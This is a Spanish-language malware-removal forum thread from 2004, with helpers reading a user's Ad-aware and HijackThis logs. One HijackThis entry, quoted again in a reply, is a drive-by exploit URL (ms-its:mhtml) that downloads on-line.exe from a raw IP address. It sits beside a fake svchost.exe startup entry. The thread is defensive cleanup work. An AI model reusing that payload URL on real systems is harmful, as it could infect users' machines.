Foros de daboweb
SEGURIDAD INFORMATICA, Firewall, parches, vacunas, antivirus, anti troyanos, spyware etc => Seguridad Informatica - Firewall - Virus - Troyanos - Spyware - Ad Aware - Malware => Mensaje iniciado por: Pertusi77 en 22 de Junio de 2004, 02:49:13 pm
-
Hola a todos !!:
Bueno mi problema es simple debo tener 1 troyano que me da como pagina de inicio justamente your searcher.com/index y me tiene loco me agrega a favoritos unos links y probe con el cwshredder ad ware hi jack y nada.. no se si lo hago bien o es otro tipo de troyano por favor!! necesito alguien tenga la amabilidad de ayudarme con este problema...
Agradecere toda ayuda
gracias de vuelta.
-
hola:
Bienvenido al foro Pertusi77.
Instala el programa ad-aware 6.181, actualizalo y escanea el pc en la configuracion que aqui se indica...
http://www.daboweb.com/phpBB2/viewtopic.php?t=2443
Cuando finalice el escaneo, pulsa en mostrar log , y pega aqui el contenido íntegro, a ver si nuestro compañero Fats puede orientarte..
Un saludo
.
-
Aguante Ciro!! :D
Vamos a solucionar ese temita. Por lo pronto hacé lo que dijo destroyer, y veamos qué tenemos...
Bienvenido al foro!
-
hola que tal gracias por la buena onda y si aguante ciro y attaque 77!!
bueno perdon por tardar por favor saquenme esta porqueria de encima por que me esta volviendo loco
aca esta el log,,,
Lavasoft Ad-aware Personal Build 6.181
Logfile created on :Miércoles, 23 de Junio de 2004 07:37:59 p.m.
Created with Ad-aware Personal, free for private use.
Using reference-file :01R324 22.06.2004
______________________________________________________
Reffile status:
=========================
Reference file loaded:
Reference Number : 01R324 22.06.2004
Internal build : 256
File location : C:\ARCHIVOS DE PROGRAMA\LAVASOFT\AD-AWARE 6\reflist.ref
Total size : 1265402 Bytes
Signature data size : 1244925 Bytes
Reference data size : 20413 Bytes
Signatures total : 27677
Target categories : 10
Target families : 506
Memory + processor status:
==========================
Number of processors : 1
Processor architecture : Intel Pentium III
Memory available:82 %
Total physical memory:523696 kb
Available physical memory:378100 kb
Total page file size:1573452 kb
Available on page file:1509524 kb
Total virtual memory:2093056 kb
Available virtual memory:2051136 kb
OS:Windows (98)
Ad-aware Settings
=========================
Set : Activate in-depth scan (Recommended)
Set : Safe mode (always request confirmation)
Set : Scan active processes
Set : Scan registry
Set : Deep scan registry
Set : Scan my IE Favorites for banned URLs
Set : Scan within archives
Set : Scan my Hosts file
Extended Ad-aware Settings
=========================
Set : Unload recognized processes during scanning
Set : Reanalyze result after scanning, before displaying result list
Set : Run scan as background process (Low CPU usage)
Set : Include basic Ad-aware settings in logfile
Set : Include additional Ad-aware settings in logfile
Set : Let windows remove files in use at next reboot
Set : Delete quarantined objects after restoring
Set : Always back up reference file, before updating
Set : Play sound if scan produced a result
23-06-04 07:37:59 p.m. - Scan started. (Custom mode)
Listing running processes
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
#:1 [kernel32.dll]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4291766279
Threads : 4
Priority : High
FileSize : 468 KB
FileVersion : 4.10.2222
ProductVersion : 4.10.2222
Copyright : Copyright (C) Microsoft Corp. 1991-1999
CompanyName : Microsoft Corporation
FileDescription : Componente del n
InternalName : KERNEL32
OriginalFilename : KERNEL32.DLL
ProductName : Sistema operativo Microsoft(R) Windows(R)
Created on : 01/01/01
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/05/99 01:22:00 a.m.
#:2 [msgsrv32.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294909087
Threads : 1
Priority : Normal
FileSize : 11 KB
FileVersion : 4.10.2222
ProductVersion : 4.10.2222
Copyright : Copyright (C) Microsoft Corp. 1992-1998
CompanyName : Microsoft Corporation
FileDescription : Servidor de mensajes VxD de 32 bits de Windows
InternalName : MSGSRV32
OriginalFilename : MSGSRV32.EXE
ProductName : Sistema operativo Microsoft(R) Windows(R)
Created on : 01/01/01
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/05/99 01:22:00 a.m.
#:3 [mprexe.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294962031
Threads : 1
Priority : Normal
FileSize : 28 KB
FileVersion : 4.10.1998
ProductVersion : 4.10.1998
Copyright : Copyright (C) Microsoft Corp. 1993-1998
CompanyName : Microsoft Corporation
FileDescription : WIN32 Network Interface Service Process
InternalName : MPREXE
OriginalFilename : MPREXE.EXE
ProductName : Microsoft(R) Windows(R) Operating System
Created on : 01/01/01
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/05/99 01:22:00 a.m.
#:4 [mstask.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294866987
Threads : 2
Priority : Normal
FileSize : 109 KB
FileVersion : 4.71.1972.1
ProductVersion : 4.71.1972.1
Copyright : Copyright (C) Microsoft Corp. 2000
CompanyName : Microsoft Corporation
FileDescription : Task Scheduler Engine
InternalName : TaskScheduler
OriginalFilename : mstask.exe
ProductName : Microsoft
Created on : 06/04/04 02:40:11 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/04/04 02:40:12 a.m.
#:5 [nprotect.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\NORTON UTILITIES\
ProcessID : 4294866943
Threads : 5
Priority : Normal
FileSize : 132 KB
FileVersion : 15.03.0.36
ProductVersion : 15.03.0.36
Copyright : Copyright (C) 2002 Symantec Corporation
CompanyName : Symantec Corporation
FileDescription : Norton Protection Status
InternalName : NPROTECT
OriginalFilename : NPROTECT.EXE
ProductName : Norton Utilities
Created on : 06/03/02 08:56:36 p.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 05/02/02 09:03:00 a.m.
#:6 [navapw32.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\NORTON ANTIVIRUS\
ProcessID : 4294846167
Threads : 6
Priority : Normal
FileSize : 37 KB
FileVersion : 5.0.0.26
ProductVersion : 5.0.0.26
Copyright : Copyright (C) Symantec Corporation 1991-1997
CompanyName : Symantec Corporation
FileDescription : Norton AntiVirus Auto-Protect Agent
InternalName : NAVAPW32
OriginalFilename : NAVAPW32.DLL
ProductName : Norton AntiVirus
Created on : 03/01/04 12:08:50 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 30/06/98 07:19:08 p.m.
#:7 [mmtask.tsk]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294884691
Threads : 1
Priority : Normal
FileSize : 1 KB
FileVersion : 4.03.1998
ProductVersion : 4.03.1998
Copyright : Copyright
CompanyName : Microsoft Corporation
FileDescription : Multimedia background task support module
InternalName : mmtask.tsk
OriginalFilename : mmtask.tsk
ProductName : Microsoft Windows
Created on : 01/01/01
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/05/99 01:22:00 a.m.
#:8 [explorer.exe]
FilePath : C:\WINDOWS\
ProcessID : 4294872611
Threads : 6
Priority : Normal
FileSize : 176 KB
FileVersion : 4.72.3110.1
ProductVersion : 4.72.3110.1
Copyright : (C) Microsoft Corporation 1981-1997
CompanyName : Microsoft Corporation
FileDescription : Explorador de Windows
InternalName : explorer
OriginalFilename : EXPLORER.EXE
ProductName : Sistema operativo Microsoft(R) Windows NT(R)
Created on : 06/05/99 01:22:00 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/05/99 01:22:00 a.m.
#:9 [taskmon.exe]
FilePath : C:\WINDOWS\
ProcessID : 4294833603
Threads : 1
Priority : Normal
FileSize : 28 KB
FileVersion : 4.10.1998
ProductVersion : 4.10.1998
Copyright : Copyright (C) Microsoft Corp. 1998
CompanyName : Microsoft Corporation
FileDescription : Task Monitor
InternalName : TaskMon
OriginalFilename : TASKMON.EXE
ProductName : Microsoft(R) Windows(R) Operating System
Created on : 01/01/01
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/05/99 01:22:00 a.m.
#:10 [systray.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294825183
Threads : 2
Priority : Normal
FileSize : 32 KB
FileVersion : 4.10.2222
ProductVersion : 4.10.2222
Copyright : Copyright (C) Microsoft Corp. 1993-1998
CompanyName : Microsoft Corporation
FileDescription : Subprograma Bandeja de sistema
InternalName : SYSTRAY
OriginalFilename : SYSTRAY.EXE
ProductName : Sistema operativo Microsoft(R) Windows(R)
Created on : 01/01/01
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/05/99 01:22:00 a.m.
#:11 [ddhelp.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294728027
Threads : 4
Priority : Realtime
FileSize : 32 KB
FileVersion : 4.09.00.0900
ProductVersion : 4.09.00.0900
Copyright : Copyright
CompanyName : Microsoft Corporation
FileDescription : Microsoft DirectX Helper
InternalName : DDHelp.exe
OriginalFilename : DDHelp.exe
ProductName : Microsoft
Created on : 14/05/04 02:54:52 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 12/12/02 03:14:32 a.m.
#:12 [loadqm.exe]
FilePath : C:\WINDOWS\
ProcessID : 4294730979
Threads : 3
Priority : Normal
FileSize : 7 KB
FileVersion : 5.4.1103.3
ProductVersion : 5.4.1103.3
Copyright : Copyright (C) Microsoft Corp. 1981-1999
CompanyName : Microsoft Corporation
FileDescription : Microsoft QMgr
InternalName : LOADQM.EXE
OriginalFilename : LOADQM.EXE
ProductName : QMgr Loader
Created on : 03/01/04 12:20:21 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 03/05/00 08:23:10 p.m.
#:13 [remoterm.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\PINNACLE\STUDIO PCTV\REMOTE\
ProcessID : 4294713903
Threads : 1
Priority : Normal
FileSize : 36 KB
FileVersion : 1.0.1.2
ProductVersion : 4, 0, 1, 0
Copyright : Copyright
CompanyName : Pinnacle Systems GmbH
FileDescription : remoterm
InternalName : remoterm
OriginalFilename : remoterm.exe
ProductName : STUDIO PCTV
Created on : 20/03/04 04:51:43 p.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 02/05/00 07:15:08 p.m.
#:14 [soundman.exe]
FilePath : C:\WINDOWS\
ProcessID : 4294717087
Threads : 1
Priority : Normal
FileSize : 46 KB
FileVersion : 5.0.12
ProductVersion : 5.0.12
Copyright : Copyright (c) 2001-2002 Realtek Semiconductor Corp.
CompanyName : Realtek Semiconductor Corp.
FileDescription : Realtek Sound Manager
InternalName : ALSMTray
OriginalFilename : ALSMTray.exe
ProductName : Realtek Sound Manager
Created on : 06/05/04 11:02:26 p.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 10/01/02 06:26:02 a.m.
#:15 [evntsvc.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\ARCHIVOS COMUNES\REAL\UPDATE_OB\
ProcessID : 4294731799
Threads : 2
Priority : Normal
FileSize : 143 KB
FileVersion : 0.1.0.880
ProductVersion : 0.1.0.880
Copyright : Copyright
CompanyName : RealNetworks, Inc.
FileDescription : RealNetworks Scheduler
InternalName : schedapp
OriginalFilename : evntsvc.EXE
ProductName : RealOne Player (32-bit)
Created on : 03/04/04 12:03:51 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 03/04/04 12:03:52 a.m.
#:16 [msnmsgr.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\MSN MESSENGER\
ProcessID : 4294707151
Threads : 2
Priority : Normal
FileSize : 4572 KB
FileVersion : 6.1.0211
ProductVersion : Version 6.1
Copyright : Copyright (c) Microsoft Corporation 1997-2003
CompanyName : Microsoft Corporation
FileDescription : Messenger
InternalName : msnmsgr
OriginalFilename : msnmsgr.exe
ProductName : Messenger
Created on : 05/03/04 02:01:00 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 05/03/04 02:01:00 a.m.
#:17 [sysdoc32.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\NORTON UTILITIES\
ProcessID : 4294725127
Threads : 2
Priority : Idle
FileSize : 24 KB
FileVersion : 15.03.0.36
ProductVersion : 15.03.0.36
Copyright : Copyright (C) 2002 Symantec Corporation
CompanyName : Symantec Corporation
FileDescription : Norton System Doctor
InternalName : SYSDOC32
OriginalFilename : SYSDOC32.EXE
ProductName : Norton Utilities
Created on : 06/03/02 08:56:32 p.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 05/02/02 09:03:00 a.m.
#:18 [wmiexe.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294690127
Threads : 3
Priority : Normal
FileSize : 16 KB
FileVersion : 5.00.1755.1
ProductVersion : 5.00.1755.1
Copyright : Copyright (C) Microsoft Corp. 1981-1998
CompanyName : Microsoft Corporation
FileDescription : WMI service exe housing
InternalName : wmiexe
OriginalFilename : wmiexe.exe
ProductName : Microsoft(R) Windows NT(R) Operating System
Created on : 01/01/01
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 06/05/99 01:22:00 a.m.
#:19 [ad-aware.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\LAVASOFT\AD-AWARE 6\
ProcessID : 4294596723
Threads : 3
Priority : Idle
FileSize : 668 KB
FileVersion : 6.0.1.181
ProductVersion : 6.0.0.0
Copyright : Copyright
CompanyName : Lavasoft Sweden
FileDescription : Ad-aware 6 core application
InternalName : Ad-aware.exe
OriginalFilename : Ad-aware.exe
ProductName : Lavasoft Ad-aware Plus
Created on : 22/06/04 11:18:37 p.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 13/07/03 12:00:20 a.m.
Memory scan result :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
New objects : 0
Objects found so far: 0
Started registry scan
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Registry scan result :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
New objects : 0
Objects found so far: 0
Started deep registry scan
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Possible browser hijack attempt : Software\Microsoft\Internet Explorer\MainStart Pageabout:blank
Possible Browser Hijack attempt Object recognized!
Type : RegData
Data : "about:blank"
Category : Data Miner
Comment : Possible browser hijack attempt
Rootkey : HKEY_CURRENT_USER
Object : Software\Microsoft\Internet Explorer\Main
Value : Start Page
Data : "about:blank"
Possible browser hijack attempt : Software\Microsoft\Internet Explorer\MainStart Pageabout:blank
Possible Browser Hijack attempt Object recognized!
Type : RegData
Data : "about:blank"
Category : Data Miner
Comment : Possible browser hijack attempt
Rootkey : HKEY_LOCAL_MACHINE
Object : Software\Microsoft\Internet Explorer\Main
Value : Start Page
Data : "about:blank"
Possible browser hijack attempt : .Default\Software\Microsoft\Internet Explorer\MainStart Pageabout:blank
Possible Browser Hijack attempt Object recognized!
Type : RegData
Data : "about:blank"
Category : Data Miner
Comment : Possible browser hijack attempt
Rootkey : HKEY_USERS
Object : .Default\Software\Microsoft\Internet Explorer\Main
Value : Start Page
Data : "about:blank"
Deep registry scan result :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
New objects : 3
Objects found so far: 3
Tracking Cookie Object recognized!
Type : File
Data : anyuser@atdmt[1].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:20:26 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:20:28 a.m.
Tracking Cookie Object recognized!
Type : File
Data : [email protected][1].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:32:57 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:32:58 a.m.
Tracking Cookie Object recognized!
Type : File
Data : anyuser@sexlist[1].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:40:25 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:40:26 a.m.
Tracking Cookie Object recognized!
Type : File
Data : anyuser@xxxcounter[2].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:33:10 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:33:12 a.m.
Tracking Cookie Object recognized!
Type : File
Data : anyuser@paycounter[2].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:45:09 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:45:10 a.m.
Tracking Cookie Object recognized!
Type : File
Data : [email protected][1].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:39:22 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:39:24 a.m.
Tracking Cookie Object recognized!
Type : File
Data : [email protected][1].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:43:47 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:43:48 a.m.
Tracking Cookie Object recognized!
Type : File
Data : [email protected][1].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:48:37 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:48:38 a.m.
Tracking Cookie Object recognized!
Type : File
Data : anyuser@sextracker[1].txt
Category : Data Miner
Comment :
Object : C:\WINDOWS\Cookies\
Created on : 23/06/04 05:48:37 a.m.
Last accessed : 23/06/04 03:00:00 a.m.
Last modified : 23/06/04 05:48:38 a.m.
Disk scan result for C:\
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
New objects : 0
Objects found so far: 12
Scanning Hosts file(C:\WINDOWS\hosts)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Hosts file scan result:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
0 entries scanned.
New objects :0
Objects found so far: 12
Performing conditional scans..
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Conditional scan result:
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
New objects : 0
Objects found so far: 12
Reanalyzing scan result
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
No objects have been removed from the result list.
10:01:19 p.m. Scan complete
Summary of this scan
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Total scanning time :02:23:19:740
Objects scanned :72173
Objects identified :12
Objects ignored :0
New objects :12
ojala sepan decirme que hacer por favor espero ansiosamente la respuesta gracias muchachos!!!
-
Ok, por lo que vos comentás parece ser la variante de CWS llamada CWS.Systeminit, pero hay cosas que no veo...
De hecho lo que muestra el log del Ad-Aware es que tenés algunos Tracking Cookies, que se pueden eliminar sin pensarlo dos veces, y tres entradas de la registry que hacen referencia a que tu página de inicio es about:blank. Esto en sí no es ningún problema (yo tengo puesto como página de inicio about:blank y me salen los mismos resultados que a vos).
El tema es que anda dando vueltas otra variante de CWS (CoolWebSearch) que pone la página de inicio en about:blank. Por eso dice 'Possible Browser Hijack', porque puede ser que vos hayas puesto la página de inicio en about:blank.
Para las Tracking Cookies: volvé a escanear con el Ad-Aware y cuando llegues al final marcá las cookies y presioná Next. Con eso van a parar a cuarentena. Podés dejarlas ahí o eliminarlas de la cuarentena.
Para los otros tres por el momento no hagamos nada.
Lo que quiero que hagas ahora es bajarte el HijackThis de http://www.spywareinfo.com/~merijn/files/HijackThis.exe , ponelo en una carpeta nueva llamada, por ejemplo, C:\HijackThis, y abrilo. Presioná Scan, después Save log, dale enter para guardar el log y vas a ver que se abre el Bloc de notas. Ahí copiá TODO el log y pegalo acá.
Espero el log, así vemos qué pasa.
-
hola bueno como me dijeron aca esta lo solicitado, quiero agradecer la ayuda nuevamente y agregar que tengo en c: el archivo win386. swp estoy segurot iene que ver con esta porqueria y por mas que lo borre se regenera y ocupa como 500 megas!! por favor saquen,me esto tambien de encima
bueno gracias como siempre ahi va la info...
Logfile of HijackThis v1.97.7
Scan saved at 08:20:43 p.m., on 24/06/04
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\ARCHIVOS DE PROGRAMA\NORTON UTILITIES\NPROTECT.EXE
C:\ARCHIVOS DE PROGRAMA\NORTON ANTIVIRUS\NAVAPW32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\LOADQM.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\ARCHIVOS DE PROGRAMA\PINNACLE\STUDIO PCTV\REMOTE\REMOTERM.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\ARCHIVOS DE PROGRAMA\ARCHIVOS COMUNES\REAL\UPDATE_OB\EVNTSVC.EXE
C:\ARCHIVOS DE PROGRAMA\NORTON UTILITIES\SYSDOC32.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\SYSTEM\PSTORES.EXE
C:\WINDOWS\ESCRITORIO\HIJACKTHIS.EXE
C:\ARCHIVOS DE PROGRAMA\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\JFHHCP32.EXE
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [PCTVRemote] C:\ARCHIVOS DE PROGRAMA\PINNACLE\STUDIO PCTV\REMOTE\REMOTERM.EXE
O4 - HKLM\..\Run: [Initialize8x8] C:\WINDOWS\pinnacle\PCTV\8x8_init.exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [TkBellExe] C:\Archivos de programa\Archivos comunes\Real\Update_OB\evntsvc.exe -osboot
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Norton Auto-Protect] C:\ARCHIV~1\NORTON~1\NAVAPW32.EXE /LOADQUIET
O4 - HKLM\..\Run: [NPROTECT] C:\Archivos de programa\Norton Utilities\NPROTECT.EXE
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [NPROTECT] C:\Archivos de programa\Norton Utilities\NPROTECT.EXE
O4 - HKCU\..\Run: [MsnMsgr] "C:\Archivos de programa\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [SpyKiller] C:\Archivos de programa\SpyKiller\spykiller.exe /startup
O4 - HKCU\..\Run: [System Mechanic Popup Stopper] "C:\ARCHIVOS DE PROGRAMA\IOLO\SYSTEM MECHANIC 4\POPUPSTOPPER.EXE"
O4 - HKCU\..\Run: [cvchost] c:\windows\svchost.exe
O4 - Startup: Norton System Doctor.lnk = C:\Archivos de programa\Norton Utilities\SYSDOC32.EXE
O9 - Extra 'Tools' menuitem: Consola de Sun Java (HKLM)
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://81.211.105.37/20609/online.chm::/on-line.exe
-
Nooooo, el win386.swp es un archivo (desgraciadamente) necesario. Es el lugar donde Windows, cuando se le acaba la memoria, sigue trabajando. Se llama Swap File, o archivo de swapeo, y es como si Windows se reservara un espacio en disco para hacer operaciones.
Ese espacio en disco lo podés limitar vos, pero hay un límite entre performance y tamaño (si lo bajás mucho de tamaño, cae estrepitosamente la performance y tu máquina se va a hacer muuuuuuuy lenta, y si lo subís demasiado, es al pedo y te quita espacio en disco). Pero lo que sea que hagas siempre tené en cuenta que es un archivo necesario.
Bueno, efectivamente hay algo allí. ¿Probaste visitar los antivirus online?
Vamos a hacer lo siguiente: primero que nada (MUY IMPORTANTE) poné el HijackThis como te dije en una carpeta propia. Esto es porque cuando trabajes con él va a hacer backups y tiene que ponerlos en algun lugar que no sea el Escritorio. Luego cerrá todos los programas (todos, incluso las ventanas de explorador) y abrí de nuevo el HijackThis desde su ubicación nueva. Presioná Scan y después ponele una marquita a lo siguiente (y no a las demás entradas):
O4 - HKCU\..\Run: [cvchost] c:\windows\svchost.exe
O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://81.211.105.37/20609/online.chm::/on-line.exe
Presioná Fix checked. Cerrá el HT.
El archivo svchost.exe es un archivo de sistema... pero de sistema Windows 2000 y XP. No está ni por las tapas en Windows 98, así que es altamente probable que sea un troyano o un virus.
Ahora reiniciá tu máquina en modo A prueba de fallos (con F8 cuando se reinicia, tal vez alguna vez lo hiciste), y ponela para ver archivos ocultos y de sistema según lo que dice en http://www.daboweb.com/phpBB2/viewtopic.php?t=5087
Ahí buscá los siguientes archivos y hacelos percha:
C:\WINDOWS\SYSTEM\JFHHCP32.EXE
c:\windows\svchost.exe
C:\foo.mht! (o C:\foo.mht sin el signo de admiración)
Si no los encontrás, mejor. Pero igual te aconsejo que después de eso rebootées en modo normal y pases TODOS los antivirus online que te detallo:
http://www.kaspersky.com/scanforvirus
http://security.symantec.com/
http://housecall.trendmicro.com/
http://www.pandasoftware.com/activescan/
http://www.ravantivirus.com/scan/
Fijate que en el primero, Kaspersky, tienen un analizador de archivos, lo que no recuerdo es dónde está. Lo que podés hacer es lo siguiente:
Copiate los archivos a otra carpeta antes de eliminarlos (siempre en modo A prueba de fallos) y cambiales la extensión a cualquier cosa (de .exe a .paja, si querés) de modo tal que ni por accidente puedas ejecutarlos. Después borrá los originales y después analizá uno por uno con lo de Kaspersky y me contás.
Pero es necesario que pases por los antivirus para salir de dudas en cuanto a que no quede nada, ¿ok?
Espero tus comentarios y o respuestas.
-
hola que taL!! bueno muchas gracias por ltoda la ayuda. Realice todo lo solictiado el archivo de los 3 que encontre fue el
c windows/system/jfhhcp.exe por suerte los otros 2 ya estaban eliminados pase 3 antivurs y el de norton panda y rantivirus todos me dieron cero virus... por suerte y la pagina nuevamente en blanco pero no se si quieren que vuelva a pegar el log a ver si pueden decirme si realmente quedo alguna señal de algo no lo se
mi otra pregunta es que programa puedo tener bueno realmente anti troyanos y demas cosas el norton firewall??? por que ese me alenta la pc mal.. no se por que si consume muchos recursos o que problema tiene..
algun consejo de algun firewall o algun programa que no me mate la perfomance de la PC? bueno cualquier consejo que me puedan dar sera nuevamente bien venido...
muvchas gracias por todo y aparentemente tengo ahora la maquina sana pero no canto victoria asi nomas... cualquier cosa pego 1 grito
espero me contesten..a la brevedad saludos a todos
-
hola como estan!! bueno este es un mensaje que lamento tener que hacer.. hehe resulta que en trabajo tengo 1 pc ene ste caso windows milenium ( sin comentarios se que es 1 porqueria ahora me van a instalar el 2000 por suerte...
cuestion es que tengo 1 troyano hice lo mismo que antes adaware actualizado y aca esta el log please si son tan amables de darme otra mano.. la verdad me alegra saber que hay gente predispuesta que la tiene muy clara a ayudar a los demas..
este es el log
Ad-aware Settings
=========================
Set : Activate in-depth scan (Recommended)
Set : Safe mode (always request confirmation)
Set : Scan active processes
Set : Scan registry
Set : Deep scan registry
28-06-2004 12:37:42 p.m. - Scan started. (Smart mode)
Listing running processes
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
#:1 [kernel32.dll]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4279204949
Threads : 4
Priority : High
FileSize : 536 KB
FileVersion : 4.90.3000
